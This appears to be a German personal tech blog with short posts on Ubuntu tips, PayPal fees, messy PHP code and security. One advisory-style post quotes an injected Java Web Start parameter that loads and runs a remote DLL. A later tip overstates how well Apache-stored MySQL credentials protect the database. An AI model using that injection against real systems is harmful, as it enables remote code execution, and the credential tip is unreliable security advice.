Adobe Air auf Ubuntu installieren
Da ich ein stolzes Grooveshark VIP-Membership besitze, habe ich mir heute mal vorgenommen den angeblich auch auf Linux laufenden Grooveshark Desktop Client zu installieren. Gesagt, getan.
Einziges Problem: Grooveshark Desktop benötigt Adobe Air – lasst es uns installieren!
1. – Adobe Air Installer for Linux herunterladen:
1 | wget http://airdownload.adobe.com/air/lin/download/1.5/AdobeAIRInstaller.bin |
2. – Installer per chmod ausführbar machen:
1 | chmod +x AdobeAIRInstaller.bin |
3. – Installer starten:
1 | sudo ./AdobeAIRInstaller.bin |
4. – Lizenz zur Kenntnis nehmen:
Adobe Air Lizenzvertrag (unter Ubuntu Linux)
5. – Installation wird durchgeführt:
Adobe Air Installation (Ubuntu Linux)
6. – Updates durchführen:
Nach der erfolgreichen Installation wird höchstwahrscheinlich direkt ein weiteres Dialogfenster erscheinen, das euch über verfügbare Softwareupdates für Adobe Air informiert. Da Adobe Air meines Wissens noch relativ neu auf dem Markt ist, wäre es generell ratsam die Aktualisierung durchzuführen – ich habe es jedenfalls gemacht.
Herzlichen Glückwunsch, du hast soeben Adobe Air auf deinem Linux-System installiert!
Mein nächster Schritt ist jetzt, die Grooveshark Desktop-Version (.air-Installer) mittels des Adobe Air Installer zum laufen zu bringen. (Update: Es läuft. Juchu!)
Da im Nautilus Dateimanager in Ubuntu seit dem letzten Update auf Lucid Lynx die Adresszeile nicht mehr standardmäßig wie ein Textfeld editieren werden kann, musste ich mir mal wieder die Tastenkombination heraussuchen um die Adresszeile anzuzeigen:
1 | STRG + L |
Viel Spaß! 
Ubuntu JPG-Datei in PDF umwandeln
Ab und an tauchen Probleme auf, die selbst mir bisher noch nicht vor die Füße gelaufen sind. Heute war mal wieder so ein Tag:
Eine Bilddatei (Format: JPEG) wird als PDF benötigt. Das klingt ziemlich nach Imagemagick, und dürfte eigentlich nichts Großes sein für mein liebes Ubuntu – ich hatte glücklicherweise Recht 
- Imagemagick installieren (falls es noch nicht installiert wurde):
1
sudo apt-get install imagemagick
- JPG-Bild in PDF umwandeln:
1
convert bild.jpg dokument.pdf
The same in English.
Bustedtees Coupon
Eine kurze Note-to-self: SURVEYTHANKS ist ein Bustedtees-Coupon, den ich mir merken sollte
Wie Reverse Mode heute morgen berichtete, gibt es eine ziemlich schlimme Sicherheitslücke beim Verarbeiten von JAVA-Einbindungen durch Browser, die das Java-Plugin installiert haben — und das ist so ziemlich jeder Browser, den es gibt. Auch Chrome und Firefox sind betroffen, genauso wie die entsprechenden Linux-Versionen des JREs.
Bei der Sicherheitslücke handelt sich um eine Command Execution Vulnerability die durch unterlassenes Überprüfen der Aufrufparameter von javaws.exe entstanden ist. Wenn ein bei der Einbindung von Java-Applets angegebener Parameter in der Form vom " -XXaltjvm="\\12.34.56.78\virus.dll vorliegt, wird von dem Java Runtime Environment die Datei unter \\12.34.56.78\virus.dll heruntergeladen und ausgeführt. Ooops!
Der folgende Codeschnipsel dürfte genügend Aufschluss über die Einbindung der betroffenen Parameter docbase und launchjlnp geben.
1 2 3 4 5 6 7 8 9 10 | if (browser == 'MSIE') { document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' + 'width="0" height="0">' + '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' + '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' + '<' + '/' + 'object' + '>'); } else if (browser == 'Netscape Family') { document.write('<' + 'embed type="application/x-java-applet;jpi-version=' + deployJava.firefoxJavaVersion + '" ' + 'width="0" height="0" ' + 'launchjnlp="' + jnlp + '"' + 'docbase="' + jnlpDocbase + '"' + ' />'); } |
Bis zu einem Schließen dieser Sicherheitslücke sollte jeder im Browser Java ausstellen.
Spende für easyComment Plugin
Hier ist gerade nach langer Zeit mal wieder eine Spende für meine easyComment Firefox Extension eingegangen, und zwar von Personalized Drumsticks (hm.. der Name klingt nach Werbung ). Das alleine ist aber kein Grund für einen Beitrag, das Problem ist mal wieder Paypal:
1 2 3 4 5 6 | Gesamtbetrag: $0,99 USD Gebühr: -$0,34 USD Nettobetrag: $0,65 USD (entspricht ) |
Die ziehen von einer $0,99 Spende mehr als 1/3 an Gebühren ab! Wie dreist ist denn das? Solche Praktiken hinterlassen leider auch bei eingehenden Spenden einen schlechten Nachgeschmack, und das Problem ist: Es gibt keine wirkliche Alternative zu Paypal. Schade.
Wer mir dennoch $ 0,99 spenden will, von denen dann etwa $ 0,65 bei mir angekommen – hier kann man eine Spende für easyComment abgeben. Vielen Dank!
Wurstiger PHP-Code
Ich darf gerade das Refactoring einer PHP4-Anwendung durchführen, und mir graute es schon von Anfang an. Aber folgende Zeilen lassen einem echt das Blut gefrieren:
1 2 3 4 | $OUT .= "<option value=\"" . (($OUTPUT_VALUE != null)?$A[$OUTPUT_VALUE] : $A["name"]) . "\" " . (($OUTPUT_EXTRA != null)?(($A[$OUTPUT_EXTRA] == $OUTPUT_EXTRA2)?"selected":""):"") . "> " . htmlentities($A["name"], ENT_QUOTES) . "</option>"; |
Eine weitere Perle, zur besseren Übersicht aus der 200 Zeichen langen Konkatenation herausgenommen:
1 | ((($OUTPUT_EXTRA3 !== null || strlen($OUTPUT_EXTRA3) > 3) && $OUTPUT_EXTRA3!=='undefined')?$OUTPUT_EXTRA3:'Ziel wählen') |
Es gibt Tage, da zweifle ich echt an meiner Berufswahl!
Was ist eine Firewall?
Das ist eine Firewall.
Ich habe gerade über einen ziemlich tollen Trick gelesen, mit dem man seine MySQL-Benutzerdaten in PHP-Scripten sehr gut absichern kann. Man muss einfach zur httpd.conf bzw. zur entsprechenden Virtualhost-Konfigurationsdatei in /etc/apache2/sites-available folgende Zeilen hinzufügen:
1 2 3 4 5 | <Directory /var/www/html/> php_value mysql.default_user **Benutzername** php_value mysql.default_password **Passwort** php_value mysql.default_host **mein.mysqlserver.tld** </Directory> |
Daraufhin kann man in jedem PHP-Script unter /var/www/html einfach folgenden Code ausführen und man erhält eine Verbindung zu dem Datenbankserver:
1 | $link = mysql_connect() or die(mysql_error()); |
Wenn nun z.B. irgendein Blog unsicheres PHP-Script geknackt wird, kann der Angreifer nicht an die Datenbank-Zugangsdaten kommen – das könnte einem Unternehmen im Ernstfall den Hintern retten.
Etwas Computerforensik gefällig?
Wer schon immer mal in die Computerforensik hinein schnuppern wollte, dem kann ich nur das englischsprachige Forensics Wiki ans Herzen legen:
Vom Aufspüren von versteckten Daten über Dateianalyse bis hin zur Abwehr von Computerforensik ist dort jeder Themenbereich der IT-Forensik mit aufschlussreichen Artikeln abgedeckt. Vor allem die Netzwerkforensik (link) ist meiner Meinung nach ein hochinteressantes Thema.
Ich hoffe, dieses Thema wird nun noch weitere Fans finden!
